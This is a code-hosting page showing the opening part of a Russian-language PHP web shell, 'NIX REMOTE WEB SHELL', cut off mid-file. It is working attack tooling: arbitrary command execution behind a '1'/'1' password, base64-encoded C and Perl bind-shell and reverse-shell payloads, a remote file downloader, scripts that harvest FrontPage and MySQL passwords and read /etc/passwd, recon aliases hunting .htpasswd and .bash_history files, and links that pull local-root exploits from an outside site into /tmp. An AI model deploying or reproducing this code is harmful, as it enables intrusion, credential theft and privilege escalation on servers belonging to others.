PageRenderTime 67ms CodeModel.GetById 24ms RepoModel.GetById 0ms app.codeStats 0ms

/xakep-shells/PHP/nixrem.php.php.txt

https://github.com/chickenlove/webshell
Plain Text | 1772 lines | 1602 code | 170 blank | 0 comment | 0 complexity | d9e10daa08c908b3431cb30e74b7e6b4 MD5 | raw file
Possible License(s): AGPL-1.0, GPL-2.0

Large files files are truncated, but you can click here to view the full file

  1. <?php
  2. #########################################################
  3. # NIX REMOTE WEB SHELL #
  4. # Coded by DreAmeRz Ver 1.0 #
  5. # ORIGINAL E-MAIL IS: dreamerz@mail.ru #
  6. #
  7. #########################################################
  8. $name="1"; // логин пользователя
  9. $pass="1"; // пароль пользователя
  10. if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
  11. {
  12. header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
  13. header("HTTP/1.0 401 Unauthorized");
  14. exit("Access Denied");
  15. }
  16. ?>
  17. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  18. <html>
  19. <head>
  20. <title>NIX REMOTE WEB-SHELL v.1.0</title>
  21. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  22. <meta http-equiv="pragma" content="no-cache">
  23. <meta http-equiv="Content-Language" content="en,ru">
  24. <META name="autor" content="DreAmeRz (www.Ru24-Team.NET)">
  25. <style type="text/css">
  26. BODY, TD, TR {
  27. text-decoration: none;
  28. font-family: Verdana;
  29. font-size: 8pt;
  30. scrollbar-face-color: #FFFFFF;
  31. scrollbar-shadow-color:#000000 ;
  32. scrollbar-highlight-color:#FFFFFF;
  33. scrollbar-3dlight-color: #000000;
  34. scrollbar-darkshadow-color:#FFFFFF ;
  35. scrollbar-track-color: #FFFFFF;
  36. scrollbar-arrow-color: #000000;
  37. }
  38. input, textarea, select {
  39. font-family: Verdana;
  40. font-size: 10px;
  41. color: black;
  42. background-color: red;
  43. border: solid 1px;
  44. border-color: black
  45. }
  46. UNKNOWN {
  47. COLOR: black;
  48. TEXT-DECORATION: none
  49. }
  50. A:link {COLOR:black; TEXT-DECORATION: none}
  51. A:visited { COLOR:black; TEXT-DECORATION: none}
  52. A:active {COLOR:black; TEXT-DECORATION: none}
  53. A:hover {color:blue;TEXT-DECORATION: none}
  54. </STYLE>
  55. </HEAD>
  56. <BODY bgcolor="#fffcf9" text="#000000">
  57. <P align=center>[ <A href="javascript:history.next(+1)">Вперед ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
  58. v.1.0<FONT color=#linux size=1> Stable </FONT> [ <A href="javascript:history.back(-1)">Назад ]</A>[ <A href="?ac=about" title='Что умеет скрипт...'>О скрипте ]</a><BR>
  59. <A href="?ac=info" title='Узнай все об этой системе!'>[ Информация о системе</A> ][ <A href="?ac=navigation" title='Удобная графическая навигация. Просмотр, редактирование...'>Навигация</A> ][ <A href="?ac=backconnect" title='Установка backconnect и обычного бекдора '>Установка
  60. бекдора</A> ][ <A href="?ac=eval" title='Создай свой скрипт на php прямо здесь :)'>PHP-код</A> ][ <A href="?ac=upload" title='Загрузка одного файла, масcовая загрузка, загрузка файлов с удаленного компьютера!'>Загрузка файлов</A> ][ <A href="?ac=shell" title='bash shell, альясы...'>Исполнение
  61. команд ]</A> <br><A href="?ac=sql" title='Работа с MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='Отправь е-mail отсюда!'>[ Отправка письма</A> ][ <A href="?ac=mailfluder" title='Тебя кто-то достал? Тогда тебе сюда...'>Маилфлудер</A>
  62. ][ <A href="?ac=tools" title='Кодировщики/декодировщики md5, des, sha1, base64... '>Инструменты ]</A>[ <A href="?ac=ps" title='Отображает список процессов на сервере и позволяет их убивать!'>Демоны</A> ][ <A href="?ac=art" title='Альтернативные методы взлома...'>Альтернативные методы</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='Надоел этот сервер? Тогда можно удалить и шелл...'>Удалить шелл</A> ]</P>
  63. <?php
  64. if (ini_get('register_globals') != '1') {
  65. if (!empty($HTTP_POST_VARS))
  66. extract($HTTP_POST_VARS);
  67. if (!empty($HTTP_GET_VARS))
  68. extract($HTTP_GET_VARS);
  69. if (!empty($HTTP_SERVER_VARS))
  70. extract($HTTP_SERVER_VARS);
  71. }
  72. Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
  73. set_magic_quotes_runtime(0);
  74. set_time_limit(0); // убрать ограничение по времени
  75. ignore_user_abort(1); // игнорировать разрыв связи с браузером
  76. error_reporting(0);
  77. $self = $_SERVER['PHP_SELF'];
  78. $docr = $_SERVER['DOCUMENT_ROOT'];
  79. $sern = $_SERVER['SERVER_NAME'];
  80. if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
  81. $aliases=array(
  82. '------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
  83. 'поиск на сервере всех файлов со suid-битом' => 'find / -type f -perm -04000 -ls',
  84. 'поиск на сервере всех файлов со sgid-битом' => 'find / -type f -perm -02000 -ls',
  85. 'поиск в текущей директории всех файлов со sgid-битом' => 'find . -type f -perm -02000 -ls',
  86. 'поиск на сервере файлов config' => 'find / -type f -name "config*"',
  87. 'поиск на сервере файлов admin' => 'find / -type f -name "admin*"',
  88. 'поиск в текущей директории файлов config' => 'find . -type f -name "config*"',
  89. 'поиск в текущей директории файлов pass' => 'find . -type f -name "pass*"',
  90. 'поиск на сервере всех директорий и файлов, открытых для записи' => 'find / -perm -2 -ls',
  91. 'поиск в текущей директории всех директорий и файлов, открытых для записи' => 'find . -perm -2 -ls',
  92. 'поиск в текущей директории файлов service.pwd' => 'find . -type f -name service.pwd',
  93. 'поиск на сервере файлов service.pwd' => 'find / -type f -name service.pwd',
  94. 'поиск на сервере файлов .htpasswd' => 'find / -type f -name .htpasswd',
  95. 'поиск в текущей директории файлов .htpasswd' => 'find . -type f -name .htpasswd',
  96. 'поиск всех файлов .bash_history' => 'find / -type f -name .bash_history',
  97. 'поиск в текущей директории файлов .bash_history' => 'find . -type f -name .bash_history',
  98. 'поиск всех файлов .fetchmailrc' => 'find / -type f -name .fetchmailrc',
  99. 'поиск в текущей директории файлов .fetchmailrc' => 'find . -type f -name .fetchmailrc',
  100. 'вывод списка атрибутов файлов на файловой системе ext2fs' => 'lsattr -va',
  101. 'просмотр открытых портов' => 'netstat -an | grep -i listen',
  102. 'поиск всех php-файлов со словом password' =>'find / -name *.php | xargs grep -li password',
  103. 'поиск папок с модом 777' =>'find / -type d -perm 0777',
  104. 'Определение версии ОС' =>'sysctl -a | grep version',
  105. 'Определение версии ядра' =>'cat /proc/version',
  106. 'Просмотр syslog.conf' =>'cat /etc/syslog.conf',
  107. 'Просмотр Message of the day' =>'cat /etc/motd',
  108. 'Просмотр hosts' =>'cat /etc/hosts',
  109. 'Версия дистрибутива 1' =>'cat /etc/issue.net',
  110. 'Версия дистрибутива 2' =>'cat /etc/*-realise',
  111. 'Показать все процесы' =>'ps auxw',
  112. 'Процессы текущего пользователя' =>'ps ux',
  113. 'Поиск httpd.conf' =>'locate httpd.conf');
  114. /* Port bind source */
  115. $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
  116. jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
  117. ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
  118. 0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
  119. mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
  120. KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
  121. hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
  122. OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
  123. rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
  124. kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
  125. 7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
  126. wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
  127. 6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
  128. hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
  129. pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
  130. sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
  131. 0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
  132. lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
  133. 9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
  134. pDQpyZXR1cm4gMDsNCn0=";
  135. $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
  136. AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
  137. NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
  138. QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
  139. pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
  140. JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
  141. 0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
  142. FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
  143. YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
  144. NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
  145. 9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
  146. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
  147. HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
  148. DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
  149. HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
  150. CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
  151. GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
  152. WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
  153. iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
  154. VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
  155. FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  156. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
  157. KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
  158. pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
  159. ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
  160. uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
  161. 9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
  162. zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
  163. QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
  164. sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
  165. pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
  166. zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
  167. sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
  168. if(isset($uploadphp))
  169. {
  170. $socket=fsockopen($iphost,$loadport); //connect
  171. fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //request
  172. while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
  173. unset($buffer); }
  174. while(!feof($socket)) $buffer.=fread($socket, 1024);
  175. $file_size=strlen($buffer);
  176. $f=fopen($loadnewname,"wb+");
  177. fwrite($f, $buffer, $file_size);
  178. echo "Размер загруженного файла: $file_size <b><br><br>" ;
  179. }
  180. if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
  181. elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
  182. else {$ac = "navigation";}
  183. switch($ac) {
  184. // Shell
  185. case "shell":
  186. echo "<SCRIPT LANGUAGE='JavaScript'>
  187. <!--
  188. function pi(str) {
  189. document.command.cmd.value = str;
  190. document.command.cmd.focus();
  191. }
  192. //-->
  193. </SCRIPT>";
  194. /* command execute */
  195. if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
  196. if (($_POST['alias']) AND ($_POST['alias']!==""))
  197. {
  198. foreach ($aliases as $alias_name=>$alias_cmd) {
  199. if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
  200. }
  201. }
  202. echo "<font face=Verdana size=-2>Выполненная команда: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
  203. echo "<b>";
  204. echo "<div align=center><textarea name=report cols=145 rows=20>";
  205. echo "".passthru($_POST['cmd'])."";
  206. echo "</textarea></div>";
  207. echo "</b>";
  208. ?>
  209. </td></tr>
  210. <tr><b><div align=center>:: Выполнение команд на сервере ::</div></b></font></td></tr>
  211. <tr><td height=23>
  212. <TR>
  213. <CENTER>
  214. <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
  215. <TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
  216. <TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
  217. <TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
  218. <TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
  219. <TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
  220. <TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
  221. <TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
  222. <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
  223. <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
  224. <TD><A HREF="JavaScript:pi('perl ');" class=fcom>perl</A> |</TD>
  225. <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
  226. <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
  227. <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
  228. <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
  229. </CENTER>
  230. </TR>
  231. <?
  232. /* command execute form */
  233. echo "<form name=command method=post>";
  234. echo "<b>Выполнить команду</b>";
  235. echo "<input type=text name=cmd size=85><br>";
  236. echo "<b>Рабочая директория &nbsp;</b>";
  237. if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
  238. else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
  239. echo "<input type=submit name=submit value=Выполнить>";
  240. echo "</form>";
  241. /* aliases form */
  242. echo "<form name=aliases method=POST>";
  243. echo "<font face=Verdana size=-2>";
  244. echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Выберите алиас<font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
  245. echo "<select name=alias>";
  246. foreach ($aliases as $alias_name=>$alias_cmd)
  247. {
  248. echo "<option>$alias_name</option>";
  249. }
  250. echo "</select>";
  251. if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
  252. else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
  253. echo "&nbsp;&nbsp;<input type=submit name=submit value=Выполнить>";
  254. echo "</font>";
  255. echo "</form>";
  256. break;
  257. case "art":
  258. echo "<a href='?ac=frontpage'><b>FrontPage Exploit by Nitrex</b></a><br>
  259. Эксплойт для FrontPage. Собирает читаемые .htpassword файлы по всему серверу. Позволяет создать нехилую базу всех сайтов в виде логин:пароль от хостера, то есть пароли к FrontPage подходят к FTP и другим сервисам сервера. Рассшифровка производится с помощью John The Ripper (Standart/DES).<br><br>
  260. <a href='?ac=dbexploit'><b>MySQL Find Config Exploit by DreAmeRz</b></a><br>
  261. Эксплоит, позволяющий облегчить поиск паролей к базе данных. Производится поиск файлов с упоминанием ряда строк, указывающих на коннект к MySQL. Также возможно совпадение паролей с другими сервисами сервера. Пароли в большенстве случаев или вовсе не зашифрованы, или зашифрованы обратимым алгоритмом. Проанализировав файлы, указанные эксплоитом, вы быстро найдете пароль к MySQL.<br><br>
  262. <a href='?ac=ftp'><b>FTP Brut by xoce</b></a><br>
  263. Полноценный брутфорсер, работающий по методу подстановки паролей, которые берет из файла. Файл генерируется сам, вы только указываете число паролей и... все - перебор начинается!!! С помощью данного брутфорсера вы сможете подобрать пароль к любому хостингу без проблем! Чтобы было что перебирать, была добавлена база паролей, которая генерируется на лету (не пишите большие цифры в количестве паролей, так как это серьезная нагрузка на сервер! 10000 вполне хватит).<br><br>
  264. <a href='?ac=ftppass'><b>FTP login:login Brut by Terabyte</b></a><br>
  265. Эксплоит позволяет перебрать аккаунт на FTP на связку login:login. Чем больше юзеров в /etc/passwd, тем больше вероятность удачной работы эксплоита.<br><br>
  266. <a href='?ac=shell'><b>Некоторые другие мини-эксплоиты приведены здесь в альясах.</b></a><br>";
  267. break;
  268. case "frontpage":
  269. $p=getenv("DOCUMENT_ROOT");
  270. if(exec("cat /etc/passwd")){
  271. $ex=explode("/", $p);
  272. $do_login=substr($p,0,strpos($p,$ex[2]));
  273. $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
  274. exec("cat /etc/passwd", $passwd);
  275. for($i=0; $i<=count($passwd); $i++) {
  276. $xz=explode(":", $passwd[$i]);
  277. $file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";
  278. if(exec("cat ".$file)){
  279. exec("cat ".$file,$open);
  280. $a=$open[count($open)-1];
  281. $fr=strpos($a, ":");
  282. $open1=substr($a, $fr);
  283. if($xz[4]=='') {
  284. $file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";
  285. Unset($domain);
  286. exec("cat ".$file1,$domain);
  287. $domain1=explode(" ",$domain[8]);
  288. $xz[4]=$domain1[1];
  289. }
  290. echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."<br>";
  291. } }
  292. }
  293. elseif(is_file("/etc/passwd")){
  294. $ex=explode("/", $p);
  295. $passwd="/etc/passwd";
  296. echo "Путь:&nbsp".$p."<br>";
  297. $do_login=substr($p,0,strpos($p,$ex[2]));
  298. $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
  299. if(is_file($passwd)) {
  300. $open=fopen($passwd,"r");
  301. while (!feof($open)) {
  302. $str=fgets($open, 100);
  303. $mas=explode(":", $str);
  304. $file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";
  305. if(is_file($file)) {
  306. echo $mas[0];
  307. $open1=fopen($file, "r");
  308. $str1=fread($open1,filesize($file));
  309. fclose($open1);
  310. $fr=strpos($str1, ":");
  311. $str2=substr($str1, $fr);
  312. $str2=rtrim($str2);
  313. //
  314. if($mas[4]=='') {
  315. $file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";
  316. $open2=fopen($file1,"r");
  317. $domain=fread($open2,filesize($file1));
  318. fclose($open2);
  319. $domain1=substr($domain,106,110);
  320. $domain2=explode("AuthUserFile",$domain1);
  321. $mas[4]=$domain2[0];
  322. }
  323. //
  324. echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."<br>";
  325. }
  326. }
  327. fclose($open);
  328. }
  329. }
  330. else{
  331. echo "С пассом облом :(((";
  332. }
  333. break;
  334. case "dbexploit":
  335. echo "<PRE>";
  336. echo "<b>В файле присутствует функция mysql_connect: </b><br>";
  337. exec("find / -name *.php | xargs grep -li mysql_connect");
  338. exec("find / -name *.inc | xargs grep -li mysql_connect");
  339. exec("find / -name *.inc.php | xargs grep -li mysql_connect");
  340. echo "<b>В файле присутствует функция mysql_select_db: </b><br>";
  341. exec("find / -name *.php | xargs grep -li mysql_select_db");
  342. exec("find / -name *.inc | xargs grep -li mysql_select_db");
  343. exec("find / -name *.inc.php | xargs grep -li mysql_select_db");
  344. echo "<b>В файле присутствует упоминание пароля: </b><br>";
  345. exec("find / -name *.php | xargs grep -li $password");
  346. exec("find / -name *.inc | xargs grep -li $password");
  347. exec("find / -name *.inc.php | xargs grep -li $password");
  348. exec("find / -name *.php | xargs grep -li $pass");
  349. exec("find / -name *.inc | xargs grep -li $pass");
  350. exec("find / -name *.inc.php | xargs grep -li $pass");
  351. echo "<b>В файле присутствует слово localhost: </b><br>";
  352. exec("find / -name *.php | xargs grep -li localhost");
  353. exec("find / -name *.inc | xargs grep -li localhost");
  354. exec("find / -name *.inc.php | xargs grep -li localhost");
  355. echo "</PRE>";
  356. break;
  357. // список процессов
  358. case "ps":
  359. echo "<b>Процессы в системе:</b><br>";
  360. echo "<br>";
  361. if ($pid)
  362. {
  363. if (!$sig) {$sig = 9;}
  364. echo "Отправление команды ".$sig." to #".$pid."... ";
  365. $ret = posix_kill($pid,$sig);
  366. if ($ret) {echo "Все, процесс убит, аминь";}
  367. else {echo "ОШИБКА! ".htmlspecialchars($sig).", в процессе #".htmlspecialchars($pid).".";}
  368. }
  369. $ret = `ps -aux`;
  370. if (!$ret) {echo "Невозможно отобразить список процессов! Видно, злой админ запретил ps";}
  371. else
  372. {
  373. $ret = htmlspecialchars($ret);
  374. while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
  375. $stack = explode("\n",$ret);
  376. $head = explode(" ",$stack[0]);
  377. unset($stack[0]);
  378. if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
  379. if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
  380. $k = $ps_aux_sort[0];
  381. if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
  382. else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
  383. for($i=0;$i<count($head);$i++)
  384. {
  385. if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
  386. }
  387. $prcs = array();
  388. foreach ($stack as $line)
  389. {
  390. if (!empty($line))
  391. {
  392. echo "<tr>";
  393. $line = explode(" ",$line);
  394. $line[10] = join(" ",array_slice($line,10,count($line)));
  395. $line = array_slice($line,0,11);
  396. $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  397. $prcs[] = $line;
  398. echo "</tr>";
  399. }
  400. }
  401. $head[$k] = "<b>".$head[$k]."</b>".$y;
  402. $head[] = "<b>ACTION</b>";
  403. $v = $ps_aux_sort[0];
  404. usort($prcs,"tabsort");
  405. if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
  406. $tab = array();
  407. $tab[] = $head;
  408. $tab = array_merge($tab,$prcs);
  409. echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  410. foreach($tab as $k)
  411. {
  412. echo "<tr>";
  413. foreach($k as $v) {echo "<td>".$v."</td>";}
  414. echo "</tr>";
  415. }
  416. echo "</table>";
  417. }
  418. break;
  419. // exploits for root...
  420. case "exploits":
  421. // thanks to xoce
  422. $public_site = "http://hackru.info/adm/exploits/public_exploits";
  423. $private_site = "http://hackru.info/adm/exploits/private_exploits";
  424. echo"Этот раздел создан по ряду причин. Во-первых, уже надоело искать одни и теже эксплоиты, во-вторых - компилирование и исправление сорцов под конкретную платформу уже тоже не приносит удовольствия. Все эксплоиты скомпилированы и настроены. Самому компилировать было влом, поэтому воспользовался готовыми :) Выражаю благодарность xoce (hackru.info)<br><br>
  425. <a href='?ac=upload&file3=$public_site/m&file2=/tmp'>Local ROOT for linux 2.6.20 - mremap (./m)</a><br>
  426. <a href='?ac=upload&file3=$public_site/p&file2=/tmp'>Local ROOT for linux 2.6.20 - ptrace (./p)</a><br>
  427. <a href='?ac=upload&file3=$private_site/brk&file2=/tmp'>BRK - Local Root Unix 2.4.*(./brk)</a><br>
  428. <a href='?ac=upload&file3=$private_site/sortrace&file2=/tmp'>Traceroute v1.4a5 exploit by sorbo (./sortrace)</a><br>
  429. <a href='?ac=upload&file3=$private_site/root&file2=/tmp'>Local Root Unix 2.4.* (./root)</a><br>
  430. <a href='?ac=upload&file3=$private_site/sxp&file2=/tmp'>Sendmail 8.11.x exploit localroot (./sxp)</a><br>
  431. <a href='?ac=upload&file3=$private_site/ptrace_kmod&file2=/tmp'>Local Root Unix 2.4.* (./ptrace_kmod)</a><br>
  432. <a href='?ac=upload&file3=$private_site/mr1_a&file2=/tmp'>Local Root Unix 2.4.* (./mr1_a)</a><br><br>";
  433. echo "Использование: заходите в /tmp из bash шелла и запускайте файлы запуска.<br>
  434. Пример: cd /tmp; ./m - все, эксплоит запустится, и если все ok, то вы получите права root'a!<br>
  435. Если здесь не оказалось подходящего эксплоита, то посетите <a href=http://www.web-hack.ru/exploits/>www.web-hack.ru/exploits/</a> и <a href=http://security.nnov.ru>security.nnov.ru</a>.";
  436. break;
  437. case "damp":
  438. if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  439. if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
  440. $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
  441. if($db)
  442. {
